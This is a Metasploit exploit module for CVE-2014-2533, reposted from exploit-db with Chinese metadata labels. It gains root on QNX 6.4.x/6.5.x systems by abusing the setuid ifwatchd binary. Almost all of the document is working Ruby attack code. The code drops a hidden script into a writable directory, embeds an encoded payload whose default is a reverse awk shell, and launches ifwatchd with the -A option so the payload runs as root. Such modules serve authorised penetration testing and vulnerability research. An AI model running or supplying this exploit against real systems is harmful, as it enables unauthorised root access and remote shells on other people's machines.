ifwatchd – Privilege Escalation (Metasploit)

  • 作者: Metasploit
    日期: 2018-10-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45575/
  • ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Local
    Rank = ExcellentRanking
    
    include Msf::Post::Linux::Priv
    include Msf::Post::File
    include Msf::Exploit::FileDropper
    
    def initialize(info = {})
    super(update_info(info,
    'Name' => 'ifwatchd Privilege Escalation',
    'Description'=> %q{
    This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
    systems by exploiting the ifwatchd suid executable.
    
    ifwatchd allows users to specify scripts to execute using the '-A'
    command line argument; however, it does not drop privileges when
    executing user-supplied scripts, resulting in execution of arbitrary
    commands as root.
    
    This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
    and 6.5.0 SP1 (x86).
    },
    'License'=> MSF_LICENSE,
    'Author' =>
    [
    'cenobyte', # Discovery and exploit
    'Tim Brown',# Independent discovery
    'Brendan Coles' # Metasploit
    ],
    'References' =>
    [
    ['CVE', '2014-2533'],
    ['BID', '66449'],
    ['EDB', '32153'],
    ['URL', 'http://seclists.org/bugtraq/2014/Mar/66']
    ],
    'DisclosureDate' => 'Mar 10 2014',
    'Platform' => 'unix', # QNX
    'Arch' => ARCH_CMD,
    'SessionTypes' => %w(shell meterpreter),
    'Targets'=> [['Automatic', {}]],
    'Privileged' => true,
    'Payload'=>
    {
    'BadChars'=> '',
    'DisableNops' => true,
    'Space' => 1024,
    'Compat'=>
    {
    'PayloadType' => 'cmd',
    'RequiredCmd' => 'gawk generic'
    }
    },
    'DefaultOptions' =>
    {
    'WfsDelay' => 10,
    'PAYLOAD'=> 'cmd/unix/reverse_awk'
    }
    ))
    register_advanced_options [
    OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
    end
    
    def ifwatchd_path
    '/sbin/ifwatchd'
    end
    
    def base_dir
    datastore['WritableDir']
    end
    
    def check
    unless setuid? ifwatchd_path
    vprint_error "#{ifwatchd_path} is not setuid"
    return CheckCode::Safe
    end
    vprint_good "#{ifwatchd_path} is setuid"
    
    CheckCode::Detected
    end
    
    def exploit
    unless check == CheckCode::Detected
    fail_with Failure::NotVulnerable, 'Target not vulnerable'
    end
    
    if is_root?
    fail_with Failure::BadConfig, 'Session already has root privileges'
    end
    
    unless writable? base_dir
    fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end
    
    script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
    
    print_status 'Writing interface arrival event script...'
    cmd_exec "echo '#!/bin/sh' > #{script_path}"
    cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}"
    cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"#{script_path}\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}"
    exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
    cmd_exec "echo \"#{exp}\" >> #{script_path}"
    cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"
    register_file_for_cleanup script_path
    
    cmd_exec "chmod +x '#{script_path}'"
    
    print_status "Executing #{ifwatchd_path}..."
    interface = 'lo0'
    cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo "
    end
    end